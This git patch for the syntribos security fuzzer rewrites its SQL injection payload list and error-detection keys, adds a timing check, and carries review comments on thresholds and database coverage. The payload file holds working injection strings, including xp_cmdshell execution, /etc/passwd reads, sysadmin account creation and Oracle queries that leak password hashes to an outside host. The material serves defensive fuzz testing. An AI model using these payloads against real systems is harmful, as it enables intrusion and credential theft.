From 5b00943aecd0e8bbfe38a40041fa6c849301a958 Mon Sep 17 00:00:00 2001
From: "michael.dong@rackspace.com"
Date: Mon, 16 May 2016 14:27:02 -0500
Subject: [PATCH] Improved SQL tests

SQL injection payloads and error strings are now similar to that of SQLmap

Change-Id: I13c041ed25be7c130e20306e828c7bd149df4da2
Implements: blueprint/test-fuzz-sql-improve
---
data/sql-injection.txt | 353 +++--------------------------------
syntribos/tests/fuzz/sql.py | 52 +++---
2 files changed, 59 insertions(+), 346 deletions(-)

diff --git a/data/sql-injection.txt b/data/sql-injection.txt
index 3de5ba47..32e3e15f 100644
--- a/data/sql-injection.txt
+++ b/data/sql-injection.txt
@@ -1,327 +1,30 @@ -'; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:2' -- -'; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:2' -- -'; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:2' -- -'; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:2' -- -'; if not(select system_user) <> 'sa' waitfor delay '0:0:2' -- -'; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:2' -- -'; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2' -- -'; if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:2' -- -'; exec master..xp_cmdshell 'ping 10.10.1.2'-- -'create user name identified by 'pass123' -- -'create user name identified by pass123 temporary tablespace temp default tablespace users; -' ; drop table temp -- -'exec sp_addlogin 'name' , 'password' -- -' exec sp_addsrvrolemember 'name' , 'sysadmin' -- -' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) -- -' grant connect to name; grant resource to name; -- -' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64) +AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT('x',(SELECT (ELT(1=1,1))),'x',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) +AND EXTRACTVALUE(1,CONCAT('','x',(SELECT (ELT(1=1,1))),'x')) +AND UPDATEXML(1,CONCAT('.','x',(SELECT (ELT(1=1,1))),'x'),2) +AND ROW(1,2)>(SELECT COUNT(*),CONCAT('x',(SELECT (ELT(1=1,1))),'x',FLOOR(RAND(0)*2))x FROM (SELECT 3 UNION SELECT 4 UNION SELECT 5 UNION SELECT 6)a GROUP BY x) +AND 1=CAST('x'||(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END))::text||'x' AS NUMERIC) +PROCEDURE ANALYSE(EXTRACTVALUE(1,CONCAT('','x',(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END)),'x')),1) +(SELECT 1 FROM(SELECT COUNT(*),CONCAT('x',(SELECT (ELT(1=1,1))),'x',FLOOR(RAND(0)*2))x 
FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) +(EXTRACTVALUE(1,CONCAT('','x',(SELECT (ELT(1=1,1))),'x'))) +(CAST('x'||(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END))::text||'x' AS NUMERIC)) +,(SELECT 1 FROM(SELECT COUNT(*),CONCAT('x',(SELECT (ELT(1=1,1))),'x',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) +,ROW(1,2)>(SELECT COUNT(*),CONCAT('x',(SELECT (ELT(1=1,1))),'x',FLOOR(RAND(0)*2))x FROM (SELECT 3 UNION SELECT 4 UNION SELECT 5 UNION SELECT 6)a GROUP BY x) +,(CAST('x'||(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END))::text||'x' AS NUMERIC)) +AND (SELECT * FROM (SELECT(SLEEP(10)))x) +AND SLEEP(10) +RLIKE (SELECT * FROM (SELECT(SLEEP(10)))x) +AND ELT(1=1,SLEEP(10)) +AND 1=(SELECT 1 FROM PG_SLEEP(10)) +(SELECT (CASE WHEN (1=1) THEN SLEEP(10) ELSE 1*(SELECT 1 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) +(SELECT * FROM (SELECT(SLEEP(10)))x) +(SELECT 1 FROM PG_SLEEP(10)) +,(SELECT (CASE WHEN (1=1) THEN SLEEP(10) ELSE 1*(SELECT 1 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) +,(SELECT (CASE WHEN (1=1) THEN (SELECT 1 FROM PG_SLEEP(10)) ELSE 1/(SELECT 0) END)) +a'b"c'd" +' or 'a'='a +" or "a"="a +') or ('a'='a +'/**/OR/**/1/**/=/**/1 ' or 1=1 -- ' union (select @@version) -- -' union (select NULL, (select @@version)) -- -' union (select NULL, NULL, (select @@version)) -- -' union (select NULL, NULL, NULL, (select @@version)) -- -' union (select NULL, NULL, NULL, NULL, (select @@version)) -- -' union (select NULL, NULL, NULL, NULL, NULL, (select @@version)) -- -<>"'%;)(&+ -| -! -? 
-/ -// -//* -' -' -- -( -) -*| -*/* -& -0 -031003000270000 -0 or 1=1 -0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q) -0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A -0x77616974666F722064656C61792027303A303A31302700 exec(@s) -1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1; -1 or 1=1 -1;SELECT%20* -1 waitfor delay '0:0:10'-- -'%20or%20''=' -'%20or%201=1 -')%20or%20('x'='x -'%20or%20'x'='x -%20or%20x=x -%20'sleep%2050' -%20$(sleep%2050) -%21 -23 OR 1=1 -%26 -%27%20or%201=1 -%28 -%29 -%2A%28%7C%28mail%3D%2A%29%29 -%2A%28%7C%28objectclass%3D%2A%29%29 -%2A%7C -||6 -'||'6 -(||6) -%7C -a' -admin' or ' -' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0)); -' and 1 in (select var from temp)-- -anything' OR 'x'='x -"a"" or 1=1--" -a' or 1=1-- -"a"" or 3=3--" -a' or 3=3-- -a' or 'a' = 'a -'%20OR -as -asc -a' waitfor delay '0:0:10'-- -'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login > -bfilename -char%4039%41%2b%40SELECT -declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q) -declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q) -declare @q nvarchar (4000) select @q = -declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s) -declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s) -declare @s varchar(22) select @s = -declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e -delete -desc -distinct -'||(elt(-3+5,bin(15),ord(10),hex(char(45)))) -'; exec master..xp_cmdshell -'; exec master..xp_cmdshell 'ping 172.10.1.255'-- -exec(@s) -'; exec ('sel' + 'ect us' + 'er') -exec sp -'; execute immediate 'sel' || 'ect us' || 'er' -exec xp -'; exec xp_regread -' group by userid having 1=1-- -handler -having -' having 
1=1-- -hi or 1=1 --" -hi' or 1=1 -- -"hi"") or (""a""=""a" -hi or a=a -hi' or 'a'='a -hi') or ('a'='a -'hi' or 'x'='x'; -insert -like -limit -*(|(mail=*)) -*(|(objectclass=*)) -or -' or ''=' - or 0=0 #" -' or 0=0 -- -' or 0=0 # -" or 0=0 -- -or 0=0 -- -or 0=0 # -' or 1 --' -' or 1/* -; or '1'='1' -' or '1'='1 -' or '1'='1'-- -' or 1=1 -' or 1=1 /* -' or 1=1-- -' or 1=1-- -'/**/or/**/1/**/=/**/1 -‘ or 1=1 -- -" or 1=1-- -or 1=1 -or 1=1-- - or 1=1 or ""= -' or 1=1 or ''=' -' or 1 in (select @@version)-- -or%201=1 -or%201=1 -- -' or 2 > 1 -' or 2 between 1 and 3 -' or 3=3 -‘ or 3=3 -- -' or '7659'='7659 - or a=a - or a = a -' or 'a'='a -' or a=a-- -') or ('a'='a -" or "a"="a -) or (a=a -order by -' or (EXISTS) - or isNULL(1/0) /* -" or isNULL(1/0) /* -' or 'something' like 'some%' -' or 'something' = 'some'+'thing' -' or 'text' = n'text' -' or 'text' > 't' -' or uid like '% -' or uname like '% -' or 'unusual' = 'unusual' -' or userid like '% -' or user like '% -' or username like '% -' or username like char(37); -' or 'whatever' in ('whatever') -' -- &password= -password:*/=1-- -PRINT -PRINT @@variable -procedure -replace -select -' select * from information_schema.tables-- -' select name from syscolumns where id = (select id from sysobjects where name = tablename')-- -' (select top 1 ---sp_password -'sqlattempt1 -(sqlattempt2) -'sqlvuln -'+sqlvuln -(sqlvuln) -sqlvuln; -t'exec master..xp_cmdshell 'nslookup www.google.com'-- -to_timestamp_tz -truncate -tz_offset -' UNION ALL SELECT -' union all select @@version-- -' union select -uni/**/on sel/**/ect -' UNION SELECT -' union select 1,load_file('/etc/passwd'),1,1,1; -) union select * from information_schema.tables; -' union select * from users where login = char(114,111,111,116); -update -'||UTL_HTTP.REQUEST -,@variable -@variable -@var select @var as var into temp end -- -\x27UNION SELECT -x' AND 1=(SELECT COUNT(*) FROM tabname); -- -x' AND email IS NULL; -- -x' AND members.email IS NULL; -- -x' AND userid IS NULL; -- 
-x' or 1=1 or 'x'='y -x' OR full_name LIKE '%Bob% -ý or 1=1 -- -sleep(__TIME__)# -1 or sleep(__TIME__)# -" or sleep(__TIME__)# -' or sleep(__TIME__)# -" or sleep(__TIME__)=" -' or sleep(__TIME__)=' -1) or sleep(__TIME__)# -") or sleep(__TIME__)=" -') or sleep(__TIME__)=' -1)) or sleep(__TIME__)# -")) or sleep(__TIME__)=" -')) or sleep(__TIME__)=' -;waitfor delay '0:0:__TIME__'-- -);waitfor delay '0:0:__TIME__'-- -';waitfor delay '0:0:__TIME__'-- -";waitfor delay '0:0:__TIME__'-- -');waitfor delay '0:0:__TIME__'-- -");waitfor delay '0:0:__TIME__'-- -));waitfor delay '0:0:__TIME__'-- -'));waitfor delay '0:0:__TIME__'-- -"));waitfor delay '0:0:__TIME__'-- -benchmark(10000000,MD5(1))# -1 or benchmark(10000000,MD5(1))# -" or benchmark(10000000,MD5(1))# -' or benchmark(10000000,MD5(1))# -1) or benchmark(10000000,MD5(1))# -") or benchmark(10000000,MD5(1))# -') or benchmark(10000000,MD5(1))# -1)) or benchmark(10000000,MD5(1))# -")) or benchmark(10000000,MD5(1))# -')) or benchmark(10000000,MD5(1))# -pg_sleep(__TIME__)-- -1 or pg_sleep(__TIME__)-- -" or pg_sleep(__TIME__)-- -' or pg_sleep(__TIME__)-- -1) or pg_sleep(__TIME__)-- -") or pg_sleep(__TIME__)-- -') or pg_sleep(__TIME__)-- -1)) or pg_sleep(__TIME__)-- -")) or pg_sleep(__TIME__)-- -')) or pg_sleep(__TIME__)-- -1'1 -1 exec sp_ (or exec xp_) -1 and 1=1 -1' and 1=(select count(*) from tablenames); -- -1 or 1=1 -1' or '1'='1 -1 -1 and user_name() = 'dbo' -\'; desc users; -- -1\'1 -1' and non_existant_table = '1 -' or username is not NULL or username = ' -1 and ascii(lower(substring((select top 1 name from sysobjects where xtype='u'), 1, 1))) > 116 -1 union all select 1,2,3,4,5,6,name from sysobjects where xtype = 'u' -- -1 uni/**/on select all from where -’ or ‘1’=’1 -' or '1'='1 -'||utl_http.request('httP://192.168.1.1/')||' -' || myappadmin.adduser('admin', 'newpass') || ' -' AND 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE ROWNUM=1)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT 
SYS.LOGIN_USER FROM DUAL)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT SYS.DATABASE_NAME FROM DUAL)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT host_name FROM v$instance)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT global_name FROM global_name)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(table_name)) FROM sys.all_tables)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(column_name)) FROM sys.all_tab_columns)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE=SYS.LOGIN_USER)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=1)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=1)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=1)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=1)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=1)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=2)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE 
LIMIT=2)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=2)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=2)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=2)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=3)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=3)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=3)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=3)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=3)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=4)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=4)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=4)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT 
FROM all_tab_columns) WHERE LIMIT=4)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=4)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=5)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=5)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=5)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=5)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=5)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=6)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=6)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=6)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=6)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=6)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT 
DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=7)) AND 'i'='i
-' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=7)) AND 'i'='i
-' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=7)) AND 'i'='i
-' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=7)) AND 'i'='i
-' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=7)) AND 'i'='i
-' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=8)) AND 'i'='i
-' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=8)) AND 'i'='i
-' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=8)) AND 'i'='i
-' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=8)) AND 'i'='i
-' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=8)) AND 'i'='i
+; OR '1'='1'
\ No newline at end of file
diff --git a/syntribos/tests/fuzz/sql.py b/syntribos/tests/fuzz/sql.py
index d057ae1c..18aedfab 100644
--- a/syntribos/tests/fuzz/sql.py
+++ b/syntribos/tests/fuzz/sql.py
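Review bot: The new time-based payloads hard-code a fixed delay (`AND SLEEP(10)`, `AND 1=(SELECT 1 FROM PG_SLEEP(10))`, the `SLEEP(10)` inside the CASE expressions), whereas the removed list parameterised it with a `__TIME__` token; a fixed 10 s is not tied to the `time_difference_percent` threshold the same commit introduces in sql.py, and it means each of the nine sleep payloads stalls the fuzzer for 10 s per injectable parameter on a vulnerable target. Keeping a placeholder such as `AND SLEEP(__TIME__)` and substituting it from config in the test would let the delay and the detection threshold be chosen together. The rewritten list also covers only MySQL and PostgreSQL for timing: the MSSQL `WAITFOR DELAY` and all Oracle probes were dropped, so time-based detection against those backends is no longer exercised at all. Most of the new boolean/error payloads are unquoted (`AND EXTRACTVALUE(...)`, `,(SELECT 1 FROM ...)`) and so only take effect in a numeric context; only a handful carry a leading `'`/`"`/`')`, so string contexts get far less coverage than before. The last payload `; OR '1'='1'` is written without a trailing newline (`\ No newline at end of file`), which is harmless only if the loader does not rely on a final line terminator.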
@@ -20,27 +20,23 @@ class SQLInjectionBody(base_fuzz.BaseFuzzTestCase):
 test_type = "data"
 data_key = "sql-injection.txt"
 failure_keys = [
- 'fatal',
- 'warning',
- 'error',
- 'exception',
- 'illegal',
- 'invalid',
- 'fail',
- 'stack',
- 'access',
- 'directory',
- 'file',
- 'not found',
- 'unknown',
- 'uid=',
- 'varchar',
- 'ODBC',
- 'SQL',
- 'quotation mark',
- 'syntax',
- 'ORA-',
- '111111'
+ "SQL syntax",
+ "mysql",
+ "MySqlException (0x",
+ "valid MySQL result",
+ "check the manual that corresponds to your MySQL server version",
+ "MySqlClient.",
+ "com.mysql.jdbc.exceptions",
+ "SQLite/JDBCDriver",
+ "SQLite.Exception",
+ "System.Data.SQLite.SQLiteException",
+ "sqlite_.",
+ "SQLite3::",
+ "[SQLITE_ERROR]",
+ "Unknown column",
+ "where clause",
+ "SqlServer",
+ "syntax error"
 ]
 
 def test_case(self):
@@ -60,6 +56,20 @@ class SQLInjectionBody(base_fuzz.BaseFuzzTestCase):
 )
 )
 
+ time_diff = self.config.time_difference_percent / 100
+ if (self.resp.elapsed.total_seconds() >
+ time_diff * self.init_response.elapsed.total_seconds()):
+ self.register_issue(
+ Issue(test="sql_timing",
+ severity="Medium",
+ confidence="Medium",
+ text=(
+ "A response to one of our payload requests has "
+ "taken too long compared to the baseline request. "
+ "This could indicate a vulnerability to time-based "
+ "SQL injection attacks"))
+ )
+
 
 class SQLInjectionParams(SQLInjectionBody):
 test_name = "SQL_INJECTION_PARAMS"
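Review bot: Several of the new `failure_keys` are sqlmap `errors.xml` regular expressions pasted as literal strings — `"sqlite_."`, `"SQLite.Exception"`, `"MySqlException (0x"` — and if the base class matches keys as plain substrings (the removed list of bare words suggests it does; the matching code is outside this hunk), `"sqlite_."` will never match a real `sqlite_query()` warning because the `.` was a regex wildcard; use `"sqlite_"` or have the base class compile the keys as patterns. The list also drops `'ORA-'` and adds no PostgreSQL, Oracle or MSSQL driver signatures even though this same commit adds PostgreSQL payloads (`PG_SLEEP`, the `::text` cast), so error-based findings on those backends are silently lost; at minimum add `"PostgreSQL", "pg_", "Npgsql.",` and `"ORA-", "Oracle error", "ODBC SQL Server Driver",` next to `"SqlServer"`. Conversely `"mysql"` on its own fires on any response body that mentions the word, including documentation text or an echoed stack trace unrelated to the injected parameter, so expect false positives unless the base class already requires the key to be absent from the baseline response. A one-line comment above the list stating the source and the matching semantics would help the next person who extends it, e.g. `# Substrings (not regexes) adapted from sqlmap's xml/errors.xml; keep them literal.`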
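Review bot: The threshold arithmetic in the new timing check treats `time_difference_percent` as a multiplier of the baseline rather than a percentage increase: with the natural reading that 50 means "50% slower", `time_diff` becomes 0.5 and `resp > 0.5 * baseline` flags almost every response as a Medium-confidence time-based SQLi. Either document that the value is a ratio expressed in percent of the baseline (200 = twice as slow) or compare against the increase, `ratio = 1 + self.config.time_difference_percent / 100.0` and `if self.resp.elapsed.total_seconds() > ratio * self.init_response.elapsed.total_seconds():` — the `100.0` also avoids integer truncation (150 // 100 == 1) if this still runs on Python 2 without `from __future__ import division`, which I cannot see from the hunk. There is no absolute floor either, so a 5 ms baseline and a 15 ms response register as an issue, and the check runs after every payload rather than only the `SLEEP(10)`/`PG_SLEEP(10)` ones, so a slow error page returned for a boolean payload is reported as timing-based; requiring the excess over baseline to also exceed a configured minimum (ideally tied to the payload delay) would make this far less noisy. `test_case` begins in the previous hunk and the rest of its body is outside this one.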